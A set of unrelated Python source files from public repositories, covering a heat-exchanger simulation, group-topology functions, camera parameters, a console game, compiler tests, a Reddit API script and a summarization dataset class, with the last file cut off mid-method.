    rhs = rhs - kappaS * As * (TS_prev[0] - TS_prev[1]) / dx
    temp = rhs * dt / (cS * rhoS * As * dx)
    TS[0] = TS_prev[0] + temp
    rhs = Qc * cL * rhoL * (Tc1[it] - TC_prev[0]) + h * Si2 * (TS_prev[-1] - TC_prev[0])
    rhs = rhs - kappaL * Ac * (TC_prev[0] - TC_prev[1]) / dx
    temp = rhs * dt / (cL * rhoL * Ac * dx)
    TC[0] = TC_prev[0] + temp
    # --- interior nodes: upwind advection + central diffusion + wall exchange ---
    for ix in range(1,nx-1):
        rhs = Qh * cL * rhoL * (TH_prev[ix-1] - TH_prev[ix]) - h * Si1 * (TH_prev[ix] - TS_prev[ix])
        rhs = rhs + kappaL * Ah * (TH_prev[ix-1] - TH_prev[ix]) / dx - kappaL * Ah * (TH_prev[ix] - TH_prev[ix+1]) / dx
        temp = rhs * dt / (cL * rhoL * Ah * dx)
        TH[ix] = TH_prev[ix] + temp
        rhs = h * Si1 * (TH_prev[ix] - TS_prev[ix]) - h * Si2 * (TS_prev[ix] - TC_prev[nx-ix-1])
        rhs = rhs + kappaS * As * (TS_prev[ix-1] - TS_prev[ix]) / dx - kappaS * As * (TS_prev[ix] - TS_prev[ix+1]) / dx
        temp = rhs * dt / (cS * rhoS * As * dx)
        TS[ix] = TS_prev[ix] + temp
        # NOTE(review): this term reads TC[ix] (the array being updated this
        # step) whereas every other coupling term uses *_prev values — at this
        # point TC[ix] still holds the previous-step value, but confirm the
        # asymmetry with the other equations is intended.
        rhs = Qc * cL * rhoL * (TC_prev[ix-1] - TC_prev[ix]) + h * Si2 * (TS_prev[nx-ix-1] - TC[ix])
        rhs = rhs + kappaL * Ac * (TC_prev[ix-1] - TC_prev[ix]) / dx - kappaL * Ac * (TC_prev[ix] - TC_prev[ix+1]) / dx
        temp = rhs * dt / (cL * rhoL * Ac * dx)
        TC[ix] = TC_prev[ix] + temp
    # --- outlet nodes (ix == nx-1): one-sided diffusion, upwind advection ---
    rhs = Qh * cL * rhoL * (TH_prev[-2] - TH_prev[-1]) - h * Si1 * (TH_prev[-1] - TS_prev[-1])
    rhs = rhs + kappaL * Ah * (TH_prev[-2] - TH_prev[-1]) / dx
    temp = rhs * dt / (cL * rhoL * Ah * dx)
    TH[-1] = TH_prev[-1] + temp
    rhs = h * Si1 * (TH_prev[-1] - TS_prev[-1]) - h * Si2 * (TS_prev[-1] - TC_prev[0])
    rhs = rhs + kappaS * As * (TS_prev[-2] - TS_prev[-1]) / dx
    temp = rhs * dt / (cS * rhoS * As * dx)
    TS[-1] = TS_prev[-1] + temp
    rhs = Qc * cL * rhoL * (TC_prev[-2] - TC_prev[-1]) + h * Si2 * (TS_prev[0] - TC_prev[-1])
    rhs = rhs + kappaL * Ac * (TC_prev[-2] - TC_prev[-1]) / dx
    temp = rhs * dt / (cL * rhoL * Ac * dx)
    TC[-1] = TC_prev[-1] + temp
    # Commit this time step: the updated fields become the "previous" fields.
    for j in range(0,nx):
        TH_prev[j] = TH[j]
        TS_prev[j] = TS[j]
        TC_prev[j] = TC[j]
    # Record the outlet temperatures of both streams for the time-history plot.
    Th2[it+1] = TH[-1]
    Tc2[it+1] = TC[-1]
fig = plt.figure(figsize = (10,7))
ax = plt.subplot(111)
ax.plot(t, Th1, label = 'Hot in')
ax.plot(t, Tc1, label = 'Cold in')
ax.plot(t, Th2, label = 'Hot out')
ax.plot(t, Tc2, label = 'Cold out')
ax.set_xlabel('Time (s)')
ax.set_ylabel('Temperature (K)')
ax.legend(loc=0)
plt.show()
fig = plt.figure(figsize = (10,7))
ax = plt.subplot(111)
ax.plot(x, TH, label = 'Hot')
ax.plot(x, TS, label = 'Surface')
ax.plot(x, TC[::-1], label='Cold')
#ax.set_xlim(0,6)
ax.set_xlabel('X (m)')
ax.set_ylabel('Temperature (K)')
ax.legend(loc=0)
plt.show()
| NingDaoguan/JI | PO6007-MSTPS/HW/HW3.py | HW3.py | py | 4,599 | python | en | code | 0 | github-code | 36 |
22041239484 | import random
def get_long_path_stage_groups(N, M, stage, lowest=2):
    """Find groups for a particular stage using long-path network.

    # Params
    N: Number of participants (integer, must be > 0).
    M: Group size (integer, must be >= 2).
    stage: Stage of deliberation (integer, must be >= 0).
    lowest: Begin with the first modulus >= lowest.

    # Returns
    A list, with each element a set of participant ids corresponding to a group.
    Participants are given integer ids in [0, N-1].
    """
    # 1 followed by the primes below 1014; stage s partitions participants
    # into residue classes modulo modulus[s].
    modulus = [
        1, 2, 3, 5, 7, 11, 13, 17, 19, 23, 29,
        31, 37, 41, 43, 47, 53, 59, 61, 67, 71,
        73, 79, 83, 89, 97,101,103,107,109,113,
        127,131,137,139,149,151,157,163,167,173,
        179,181,191,193,197,199,211,223,227,229,
        233,239,241,251,257,263,269,271,277,281,
        283,293,307,311,313,317,331,337,347,349,
        353,359,367,373,379,383,389,397,401,409,
        419,421,431,433,439,443,449,457,461,463,
        467,479,487,491,499,503,509,521,523,541,
        547,557,563,569,571,577,587,593,599,601,
        607,613,617,619,631,641,643,647,653,659,
        661,673,677,683,691,701,709,719,727,733,
        739,743,751,757,761,769,773,787,797,809,
        811,821,823,827,829,839,853,857,859,863,
        877,881,883,887,907,911,919,929,937,941,
        947,953,967,971,977,983,991,997,1009,1013
    ]
    # Remove excluded moduli (the leading 1 is always kept).
    if lowest is not None and lowest > 1:
        modulus = [1] + [x for x in modulus if x >= lowest]
    # Moduli larger than the number of groups would produce sets smaller
    # than M, so wrap `stage` around once the usable moduli run out.
    # Bugfix: floor-divide instead of int(N / M) (avoids float rounding).
    num_groups = N // M
    # Bugfix: next() with a default instead of [...][0], which raised
    # IndexError when every modulus fits within num_groups.
    num_moduli = next(
        (i for i, m in enumerate(modulus) if m > num_groups), len(modulus))
    # Bugfix: when N < M, num_groups == 0 and even modulus[0] == 1 exceeds
    # it, making num_moduli == 0 and `stage % 0` crash; use one stage.
    num_moduli = max(num_moduli, 1)
    stage = stage % num_moduli
    m = 1 if stage == 0 else modulus[stage]
    partition = []
    for j in range(m):
        # Participants congruent to j (mod m), chunked into groups of size M
        # (the final chunk of each class may be smaller).
        residue_class = [n for n in range(N) if n % m == j]
        partition += [
            set(residue_class[k:k + M])
            for k in range(0, len(residue_class), M)]
    return partition
def get_long_path_stages(N, M, D):
    """Find groups for all stages using the long-path network.

    # Params
    N: Number of participants (integer, must be > 0).
    M: Group size (integer, must be >= 2).
    D: Number of stages (integer, must be > 0).

    # Returns
    A list of D elements, one per stage, each a list as returned by
    get_long_path_stage_groups().
    """
    return [get_long_path_stage_groups(N, M, stage) for stage in range(D)]
def get_random_stage_groups(N, M, i):
    """Find groups for a particular stage using a random network.

    # Params
    N: Number of participants (integer, must be > 0).
    M: Group size (integer, must be >= 2).
    i: Stage of deliberation (unused; kept for interface symmetry).

    # Returns
    A list, with each element a set of participant ids corresponding to a
    group.  Participants are given integer ids in [0, N-1]; the final group
    may hold fewer than M members when M does not divide N.
    """
    shuffled = random.sample(range(N), N)
    return [set(shuffled[start:start + M]) for start in range(0, N, M)]
def get_random_groups(N, M, D):
    """Find the groups of all stages using the random network.

    # Params
    N: Number of participants (integer, must be > 0).
    M: Group size (integer, must be >= 2).
    D: Number of stages (integer, must be > 0).

    # Returns
    A single flat list containing the groups of all D stages concatenated.
    (Docfix: unlike get_long_path_stages(), stages are NOT kept in separate
    per-stage sublists — the previous docstring claimed a list of D elements.)
    """
    return [group
            for stage in range(D)
            for group in get_random_stage_groups(N, M, stage)]
| elplatt/Exp-Net-Delib | netdelib/topologies/topologies.py | topologies.py | py | 3,706 | python | en | code | 0 | github-code | 36 |
21241359849 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from rtm.executor import LoopMaster
__author__ = 'David Qian'
"""
Created on 02/15/2017
@author: David Qian
"""
if __name__ == '__main__':
    # Demo configuration, then run the loop master in one go.
    workdir = None
    restart_time = '0'
    cmd = './test/test.sh'
    LoopMaster(cmd, restart_time, workdir).run()
| krizex/RunnerTimer | src/rtm/demo.py | demo.py | py | 329 | python | en | code | 0 | github-code | 36 |
43354784770 | import json
from typing import Any, List
import numpy as np
import torch
from mmhuman3d.core.conventions.cameras import (
convert_cameras,
convert_K_3x3_to_4x4,
convert_K_4x4_to_3x3,
)
class CameraParameter:
def __init__(self,
name: str = 'default',
H: int = 1080,
W: int = 1920) -> None:
"""
Args:
name (str, optional):
Name of this camera. Defaults to "default".
H (int, optional):
Height of a frame, in pixel. Defaults to 1080.
W (int, optional):
Width of a frame, in pixel. Defaults to 1920.
"""
self.name = name
self.parameters_dict = {}
in_mat = __zero_mat_list__(3)
self.parameters_dict['in_mat'] = in_mat
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
self.parameters_dict['H'] = H
self.parameters_dict['W'] = W
r_mat = __zero_mat_list__(3)
self.parameters_dict['rotation_mat'] = r_mat
t_list = [0.0, 0.0, 0.0]
self.parameters_dict['translation'] = t_list
def reset_distort(self):
"""Reset all distort coefficients to zero."""
for distort_name in __distort_coefficient_names__:
self.parameters_dict[distort_name] = 0.0
def get_opencv_distort_mat(self):
"""Get a numpy array of 8 distort coefficients, which is the distCoeffs
arg of cv2.undistort.
Returns:
ndarray:
(k_1, k_2, p_1, p_2, k_3, k_4, k_5, k_6) of 8 elements.
"""
dist_coeffs = [
self.get_value('k1'),
self.get_value('k2'),
self.get_value('p1'),
self.get_value('p2'),
self.get_value('k3'),
self.get_value('k4'),
self.get_value('k5'),
self.get_value('k6'),
]
dist_coeffs = np.array(dist_coeffs)
return dist_coeffs
    def set_K_R_T(self,
                  K_mat: np.ndarray,
                  R_mat: np.ndarray,
                  T_vec: np.ndarray,
                  inverse_extrinsic: bool = False) -> None:
        """Set intrinsic and extrinsic of a camera.

        Args:
            K_mat (np.ndarray):
                In shape [3, 3].
            R_mat (np.ndarray):
                Rotation from world to view in default.
                In shape [3, 3].
            T_vec (np.ndarray):
                Translation from world to view in default.
                In shape [3,].
            inverse_extrinsic (bool, optional):
                If true, R_mat and T_vec transform a point
                from view to world. Defaults to False.
        """
        k_shape = K_mat.shape
        assert k_shape[0] == k_shape[1] == 3
        r_shape = R_mat.shape
        assert r_shape[0] == r_shape[1] == 3
        assert T_vec.ndim == 1 and T_vec.shape[0] == 3
        self.set_mat_np('in_mat', K_mat)
        if inverse_extrinsic:
            # Convert the given view-to-world transform into the stored
            # world-to-view convention: R' = R^-1, T' = -R' @ T.
            R_mat = np.linalg.inv(R_mat)
            T_vec = -np.dot(R_mat, T_vec).reshape((3))
        self.set_mat_np('rotation_mat', R_mat)
        self.set_value('translation', T_vec.tolist())
def set_mat_np(self, mat_key: str, mat_numpy: np.ndarray) -> None:
"""Set a matrix-type parameter to mat_numpy.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_numpy (ndarray):
Matrix in numpy format.
Raises:
KeyError: mat_key not in self.parameters_dict
"""
if mat_key not in self.parameters_dict:
raise KeyError(mat_key)
else:
self.parameters_dict[mat_key] = mat_numpy.tolist()
def set_mat_list(self, mat_key: str, mat_list: List[list]) -> None:
"""Set a matrix-type parameter to mat_list.
Args:
mat_key (str):
Key of the target matrix. in_mat or rotation_mat.
mat_list (List[list]):
Matrix in list format.
Raises:
KeyError: mat_key not in self.parameters_dict
"""
if mat_key not in self.parameters_dict:
raise KeyError(mat_key)
else:
self.parameters_dict[mat_key] = mat_list
def set_value(self, key: str, value: Any) -> None:
"""Set a parameter to value.
Args:
key (str):
Name of the parameter.
value (object):
New value of the parameter.
Raises:
KeyError: key not in self.parameters_dict
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
self.parameters_dict[key] = value
def get_value(self, key: str) -> Any:
"""Get a parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
return self.parameters_dict[key]
def get_mat_np(self, key: str) -> Any:
"""Get a a matrix-type parameter by key.
Args:
key (str):
Name of the parameter.
Raises:
KeyError: key not in self.parameters_dict
Returns:
object:
Value of the parameter.
"""
if key not in self.parameters_dict:
raise KeyError(key)
else:
mat_list = self.parameters_dict[key]
mat_np = np.array(mat_list).reshape((3, 3))
return mat_np
def to_string(self) -> str:
"""Convert self.to_dict() to a string.
Returns:
str:
A dict in json string format.
"""
dump_dict = self.to_dict()
ret_str = json.dumps(dump_dict)
return ret_str
def to_dict(self) -> dict:
"""Dump camera name and parameters to dict.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict.
"""
dump_dict = self.parameters_dict.copy()
dump_dict['name'] = self.name
return dump_dict
def dump(self, json_path: str) -> None:
"""Dump camera name and parameters to a file.
Returns:
dict:
Put self.name and self.parameters_dict
in one dict, and dump them to a json file.
"""
dump_dict = self.to_dict()
with open(json_path, 'w') as f_write:
json.dump(dump_dict, f_write)
def load(self, json_path: str) -> None:
"""Load camera name and parameters from a file."""
with open(json_path, 'r') as f_read:
dumped_dict = json.load(f_read)
self.load_from_dict(dumped_dict)
def load_from_dict(self, json_dict: dict) -> None:
"""Load name and parameters from a dict.
Args:
json_dict (dict):
A dict comes from self.to_dict().
"""
for key in json_dict.keys():
if key == 'name':
self.name = json_dict[key]
elif key == 'rotation':
self.parameters_dict['rotation_mat'] = np.array(
json_dict[key]).reshape(3, 3).tolist()
elif key == 'translation':
self.parameters_dict[key] = np.array(json_dict[key]).reshape(
(3)).tolist()
else:
self.parameters_dict[key] = json_dict[key]
if '_mat' in key:
self.parameters_dict[key] = np.array(
self.parameters_dict[key]).reshape(3, 3).tolist()
def load_from_chessboard(self,
chessboard_dict: dict,
name: str,
inverse: bool = True) -> None:
"""Load name and parameters from a dict.
Args:
chessboard_dict (dict):
A dict loaded from json.load(chessboard_file).
name (str):
Name of this camera.
inverse (bool, optional):
Whether to inverse rotation and translation mat.
Defaults to False.
"""
camera_param_dict = \
__parse_chessboard_param__(chessboard_dict, name, inverse=inverse)
self.load_from_dict(camera_param_dict)
def load_from_vibe(self,
vibe_camera,
name: str,
batch_index: int = 0) -> None:
"""Load name and parameters from a dict.
Args:
vibe_camera (mmhuman3d.core.cameras.
cameras.WeakPerspectiveCamerasVibe):
An instance.
name (str):
Name of this camera.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_4x4 = vibe_camera.K[batch_index:batch_index + 1] # shape (1, 4, 4)
r_3x3 = vibe_camera.R[batch_index:batch_index + 1] # shape (1, 3, 3)
t_3 = vibe_camera.T[batch_index:batch_index + 1] # shape (1, 3)
new_K, new_R, new_T = convert_cameras(
K=k_4x4,
R=r_3x3,
T=t_3,
is_perspective=False,
convention_src='pytorch3d',
convention_dst='opencv',
resolution_src=(height, width),
resolution_dst=(height, width))
k_3x3 = \
convert_K_4x4_to_3x3(new_K, is_perspective=False)
k_3x3.numpy().squeeze(0)
r_3x3 = new_R.numpy().squeeze(0)
t_3 = new_T.numpy().squeeze(0)
self.name = name
self.set_mat_np('in_mat', k_3x3)
self.set_mat_np('rotation_mat', r_3x3)
self.set_value('translation', t_3.tolist())
def get_vibe_dict(self) -> dict:
"""Get a dict of camera parameters, which contains all necessary args
for mmhuman3d.core.cameras.cameras.WeakPerspectiveCamerasVibe(). Use mm
human3d.core.cameras.cameras.WeakPerspectiveCamerasVibe(**return_dict)
to construct a camera.
Returns:
dict:
A dict of camera parameters: name, dist, size, matrix, etc.
"""
height = self.parameters_dict['H']
width = self.parameters_dict['W']
k_3x3 = self.get_mat_np('in_mat') # shape (3, 3)
k_3x3 = np.expand_dims(k_3x3, 0) # shape (1, 3, 3)
k_4x4 = convert_K_3x3_to_4x4(
K=k_3x3, is_perspective=False) # shape (1, 4, 4)
rotation = self.get_mat_np('rotation_mat') # shape (3, 3)
rotation = np.expand_dims(rotation, 0) # shape (1, 3, 3)
translation = self.get_value('translation') # list, len==3
translation = np.asarray(translation)
translation = np.expand_dims(translation, 0) # shape (1, 3)
new_K, new_R, new_T = convert_cameras(
K=k_4x4,
R=rotation,
T=translation,
is_perspective=False,
convention_src='opencv',
convention_dst='pytorch3d',
resolution_src=(height, width),
resolution_dst=(height, width))
new_K = torch.from_numpy(new_K)
new_R = torch.from_numpy(new_R)
new_T = torch.from_numpy(new_T)
ret_dict = {
'K': new_K,
'R': new_R,
'T': new_T,
}
return ret_dict
def __parse_chessboard_param__(chessboard_camera_param, name, inverse=True):
    """Parse a dict loaded from chessboard file into another dict needed by
    CameraParameter.

    Args:
        chessboard_camera_param (dict):
            A dict loaded from json.load(chessboard_file).
        name (str):
            Name of this camera.
        inverse (bool, optional):
            Whether to inverse rotation and translation mat.
            Defaults to True.

    Returns:
        dict:
            A dict of parameters in CameraParameter.to_dict() format.
    """
    camera_param_dict = {}
    # imgSize is stored as (width, height) in the chessboard file.
    camera_param_dict['H'] = chessboard_camera_param['imgSize'][1]
    camera_param_dict['W'] = chessboard_camera_param['imgSize'][0]
    camera_param_dict['in_mat'] = chessboard_camera_param['K']
    # Chessboard files carry no distortion, so zero the coefficients here.
    # NOTE(review): 'k6' is not set — CameraParameter's default (0.0) covers
    # it, but confirm the omission is intentional.
    camera_param_dict['k1'] = 0
    camera_param_dict['k2'] = 0
    camera_param_dict['k3'] = 0
    camera_param_dict['k4'] = 0
    camera_param_dict['k5'] = 0
    camera_param_dict['p1'] = 0
    camera_param_dict['p2'] = 0
    camera_param_dict['name'] = name
    camera_param_dict['rotation'] = chessboard_camera_param['R']
    camera_param_dict['translation'] = chessboard_camera_param['T']
    if inverse:
        # Invert the extrinsics: R' = R^-1, t' = -R' @ t.
        rmatrix = np.linalg.inv(
            np.array(camera_param_dict['rotation']).reshape(3, 3))
        camera_param_dict['rotation'] = rmatrix.tolist()
        tmatrix = np.array(camera_param_dict['translation']).reshape((3, 1))
        tvec = -np.dot(rmatrix, tmatrix)
        camera_param_dict['translation'] = tvec.reshape((3)).tolist()
    return camera_param_dict
__distort_coefficient_names__ = [
'k1', 'k2', 'k3', 'k4', 'k5', 'k6', 'p1', 'p2'
]
def __zero_mat_list__(n=3):
    """Return an n-by-n matrix of zeros as nested lists.

    Args:
        n (int, optional):
            Length of the edge.
            Defaults to 3.

    Returns:
        list:
            List[List[int]]
    """
    rows = []
    for _ in range(n):
        rows.append([0] * n)
    return rows
| hanabi7/point_cloud_smplify | mmhuman3d/core/cameras/camera_parameter.py | camera_parameter.py | py | 13,594 | python | en | code | 6 | github-code | 36 |
16269675107 | # Very simplified version with ASCII-based graphics
import random
class KnockoutLite:
board_len = 3
num_penguins = 1
num_players = 2
dead_flag = ['dead']
is_dead = lambda p : p == ['dead']
def __init__(self):
self.penguins = []
self.move_number = 1
for i in range(KnockoutLite.num_players * KnockoutLite.num_penguins):
self.penguins.append([random.randrange(KnockoutLite.board_len), random.randrange(KnockoutLite.board_len)])
def display_game_results(self):
if any(map(KnockoutLite.is_dead, self.penguins)):
if all(map(KnockoutLite.is_dead, self.penguins)):
print("It's a tie! (both players died)")
elif KnockoutLite.is_dead(self.penguins[0]):
print("Player 2 wins.")
else:
print("Player 1 wins.")
else:
print("Game is still running...")
def is_in_board(self, penguin_idx):
penguin = self.penguins[penguin_idx]
if KnockoutLite.is_dead(penguin):
return False
in_board = True
for dim in range(2):
in_board = in_board and penguin[dim] >= 0 and penguin[dim] < KnockoutLite.board_len
return in_board
def draw_board(self):
self.board = [['-' for r in range(KnockoutLite.board_len)] for c in range(KnockoutLite.board_len)]
check_and_update = lambda curr, new : curr + new if curr != '-' else new
for p_idx in range(len(self.penguins)):
p = self.penguins[p_idx]
if self.is_in_board(p_idx):
symbol = 'X' if p_idx // KnockoutLite.num_penguins == 0 else 'O'
self.board[p[0]][p[1]] = check_and_update(self.board[p[0]][p[1]], symbol)
for r in self.board:
print(' '.join(r))
# Print a new line
print()
@staticmethod
def swap_elems(lst, i, j):
temp = lst[i]
lst[i] = lst[j]
lst[j] = temp
def move_penguin(self, penguin_idx, direction):
for dim in range(2):
self.penguins[penguin_idx][dim] += direction[dim]
# Returns whether game can continue after executed play
def execute_play(self, directions, powers):
print("-"*8 + " Executing play number " + str(self.move_number) + " " + "-"*8)
p1_prev = self.penguins[0].copy()
p2_prev = self.penguins[1].copy()
player_is_out = False
while max(powers) > 0:
for p_idx in range(KnockoutLite.num_players):
if powers[p_idx] > 0 and not KnockoutLite.is_dead(self.penguins[p_idx]):
self.move_penguin(p_idx, directions[p_idx])
powers[p_idx] -= 1
if not self.is_in_board(p_idx):
self.penguins[p_idx] = KnockoutLite.dead_flag
player_is_out = True
# Emulate collisions by simply switching the velocities on impact
# (physically accurate since momentum is conserved)
if not player_is_out and (self.penguins[0] == self.penguins[1] or (self.penguins[0] == p2_prev and self.penguins[1] == p1_prev)):
KnockoutLite.swap_elems(directions, 0, 1)
KnockoutLite.swap_elems(powers, 0, 1)
if self.penguins[0] != self.penguins[1]:
KnockoutLite.swap_elems(self.penguins, 0, 1)
powers = list(map(lambda x: x + 1, powers))
elif all(map(KnockoutLite.is_dead, self.penguins)):
return False
self.draw_board()
p1_prev = self.penguins[0].copy()
p2_prev = self.penguins[1].copy()
self.move_number += 1
return not player_is_out
# Running the game
def update_game_params(p_inps, directions, powers):
directions.append([-int(p_inps[1]), int(p_inps[0])])
powers.append(int(p_inps[2]))
if __name__ == '__main__':
game = KnockoutLite()
run_game = True
print("Welcome, Player 1 is 'X', Player 2 is 'O'. The positive x and y directions are right and up, respectively. Each input line consists of 3 ** integers ** seperated by spaces. Each direction dimension's range is [-1, 1]. The power must be in the range [1, 3].")
game.draw_board()
while run_game:
directions = []
powers = []
print("Enter Player 1 direction and power: dirx diry pow ")
p1_inps = input().split(" ")
print("Enter Player 2 direction and power: dirx diry pow")
p2_inps = input().split(" ")
update_game_params(p1_inps, directions, powers)
update_game_params(p2_inps, directions, powers)
run_game = game.execute_play(directions, powers)
game.display_game_results()
| ashuk203/knockout-ai | Simple-version/game.py | game.py | py | 4,764 | python | en | code | 0 | github-code | 36 |
23942544871 | """Assorted algorithms to verify end-to-end compiler functionality.
These tests include:
- Sum of array of integers
- Recursive Fibonacci sum
"""
import pytest
import tempfile
import functools
import os
from acctools import compilers
ACC_PATH=os.environ.get("ACC_PATH", os.path.join(os.path.dirname(__file__), "../build/acc"))
COMPILERS = [
compilers.GccCompiler,
functools.partial(compilers.AccIrCompiler, ACC_PATH, regalloc=False),
functools.partial(compilers.AccIrCompiler, ACC_PATH, regalloc=True),
functools.partial(compilers.AccAsmCompiler, ACC_PATH)
]
@pytest.fixture(params=COMPILERS)
def cc(request):
    """Yield one compiler instance per entry in COMPILERS, each writing
    its output to a fresh temporary path."""
    # NOTE(review): the NamedTemporaryFile is deleted as soon as this
    # `with` block exits (i.e. at `return`), so the compiler receives a
    # path whose file no longer exists and recreates it — confirm this
    # name-reservation trick is intended rather than delete=False.
    with tempfile.NamedTemporaryFile() as temp_file:
        return request.param(temp_file.name)
CALCULATE_SUM = """
int calc_sum(unsigned char * arr, int n)
{
int i = 0, tot = 0;
while(i < n)
{
tot += arr[i++];
}
return tot;
}
int main()
{
unsigned char arr[7];
arr[0] = 1;
arr[1] = 2;
arr[2] = 4;
arr[3] = 8;
arr[4] = 16;
arr[5] = 32;
arr[6] = 64;
return calc_sum(arr, 7);
}
"""
def test_calculate_array_sum(cc):
    """Sum an unsigned-char array of powers of two: 1+2+4+8+16+32+64 == 127."""
    # Fix: removed the stray trailing semicolon (un-Pythonic leftover).
    cc.program(CALCULATE_SUM, returncode=127)
FIBONACCI = """
int fib(int n)
{
if(n == 0) return 1;
if(n == 1) return 1;
return fib(n-1) + fib(n-2);
}
int main()
{
int i = 0, tot = 0;
while(i < 10)
{
tot += fib(i);
i++;
}
return tot;
}
"""
def test_fibonacci(cc):
    """Recursive Fibonacci with fib(0)=fib(1)=1; sum of fib(0..9) == 143."""
    cc.program(FIBONACCI, returncode=143)
INSERTION_SORT = """
int sort(int * arr, int n)
{
int i = 1;
while(i < n)
{
int t = arr[i];
int j = i - 1;
while((t < arr[j]) & (j != -1))
{
arr[j+1] = arr[j];
j--;
}
arr[j+1] = t;
i++;
}
}
int main()
{
int l[10];
l[0] = 3;
l[1] = 8;
l[2] = 9;
l[3] = 121;
l[4] = 28;
l[5] = 1;
l[6] = 89;
l[7] = 90;
l[8] = 104;
l[9] = 101;
sort(l, 10);
return (l[0] != 1) | (l[9] != 121);
}
"""
def test_sort(cc):
    """Insertion sort of 10 ints; program exits 0 iff min==1 and max==121."""
    cc.program(INSERTION_SORT)
10179832367 | #!/usr/bin/python3
"""
Prints the titles of the first 10 hot posts listed for a given subreddit
"""
import requests
def top_ten(subreddit):
    """
    Prints the titles of the first
    10 hot posts listed for a given subreddit

    Prints None when the subreddit is invalid or the request fails.
    """
    if subreddit is None or not isinstance(subreddit, str):
        print("None")
        # Bugfix: without this return the function went on to query
        # reddit with the invalid value instead of stopping.
        return
    user_agent = {'User-agent': 'Google Chrome Version 81.0.4044.129'}
    params = {'limit': 10}
    url = 'https://www.reddit.com/r/{}/hot/.json'.format(subreddit)
    # allow_redirects=False: reddit redirects nonexistent subreddits to a
    # search page, which would otherwise return unrelated JSON.
    response = requests.get(url, headers=user_agent, params=params,
                            allow_redirects=False)
    if response.status_code != 200:
        print("None")
        return
    results = response.json()
    try:
        for post in results['data']['children']:
            print(post['data']['title'])
    except Exception:
        print("None")
| jamesAlhassan/alx-system_engineering-devops | 0x16-api_advanced/1-top_ten.py | 1-top_ten.py | py | 756 | python | en | code | 0 | github-code | 36 |
1710822043 | import logging
import warnings
import torch
import numpy as np
from data import data_utils
from data.ofa_dataset import OFADataset
logger = logging.getLogger(__name__)
warnings.filterwarnings("ignore", "(Possibly )?corrupt EXIF data", UserWarning)
def collate(samples, pad_idx, eos_idx):
    """Collate a list of per-example dicts into one padded mini-batch.

    Args:
        samples: list of dicts produced by SummaryDataset.__getitem__.
        pad_idx: padding token id used to right-pad variable-length rows.
        eos_idx: end-of-sentence token id passed through to collate_tokens.

    Returns:
        dict with batch size, token count, padded net inputs, padded
        targets and the raw target strings; empty dict for empty input.
    """
    if len(samples) == 0:
        return {}
    def merge(key):
        # Pad all samples' tensors under `key` to a common length.
        return data_utils.collate_tokens(
            [s[key] for s in samples],
            pad_idx,
            eos_idx=eos_idx,
        )
    src_tokens = merge("source")
    # True (unpadded) source lengths, counted as non-pad tokens.
    src_lengths = torch.LongTensor([s["source"].ne(pad_idx).long().sum() for s in samples])
    prev_output_tokens = None
    target = None
    if samples[0].get("target", None) is not None:
        target = merge("target")
        tgt_lengths = torch.LongTensor(
            [s["target"].ne(pad_idx).long().sum() for s in samples]
        )
        # With targets present, ntokens counts target tokens (loss scale);
        # otherwise it falls back to source tokens.
        ntokens = tgt_lengths.sum().item()
        if samples[0].get("prev_output_tokens", None) is not None:
            prev_output_tokens = merge("prev_output_tokens")
    else:
        ntokens = src_lengths.sum().item()
    # Keep the raw reference strings for metric computation (e.g. ROUGE).
    target_strs = np.array([s["target_str"] for s in samples])
    batch = {
        "nsentences": len(samples),
        "ntokens": ntokens,
        "net_input": {
            "src_tokens": src_tokens,
            "src_lengths": src_lengths,
            "prev_output_tokens": prev_output_tokens
        },
        "target": target,
        "target_strs": target_strs
    }
    return batch
class SummaryDataset(OFADataset):
def __init__(
self,
split,
dataset,
bpe,
src_dict,
tgt_dict=None,
code_dict_size=8192,
num_bins=1000,
max_src_length=512,
max_tgt_length=128,
noise_ratio=0.0,
description='base'
):
super().__init__(split, dataset, bpe, src_dict, tgt_dict)
self.max_src_length = max_src_length
self.max_tgt_length = max_tgt_length
self.code_dict_size = code_dict_size
self.num_bins = num_bins
self.noise_ratio = noise_ratio
self.description = description
if type(bpe).__name__ == 'GPT2BPE':
if self.description == 'base':
self.prompt = ' what is the summary of article " {} "?'
elif self.description == 'tep':
self.prompt = 'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'wiki-tep':
self.prompt = 'Given a document, selecting a subset of the words or sentences which best represents a summary of the document.' \
'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'annotation':
self.prompt = \
'Dataset description: Gigaword is a large-scale dataset for natural language processing tasks, such as language modeling and machine translation. It contains over 5 billion words of text, drawn from a variety of sources, including news articles, books, and websites.The annotation process for Gigaword involves collecting text from a variety of sources and ensuring that it is accurately' \
' transcribed and formatted. The text is then divided into smaller units, such as sentences or paragraphs, and annotated with additional information, such as part-of-speech tags or named entity tags. ' \
'Input format: Text' \
'Output format: Text' \
'Output description: summary of input text' \
'prompt: what is the summary of article " {} "? '
elif self.description == 'wiki':
self.prompt = \
'Given a document, selecting a subset of the words or sentences which best represents a summary of the document.' \
'prompt: what is the summary of article " {} "? '
elif description == 'onehot':
self.prompt = '1000000 {}'
elif type(bpe).__name__ == 'BertBPE':
self.prompt = "{} 请用一个句子简单总结上文:"
    def __getitem__(self, index):
        """Build one training example: prompted source tokens, target tokens
        and (noised) teacher-forcing inputs, plus the raw target string."""
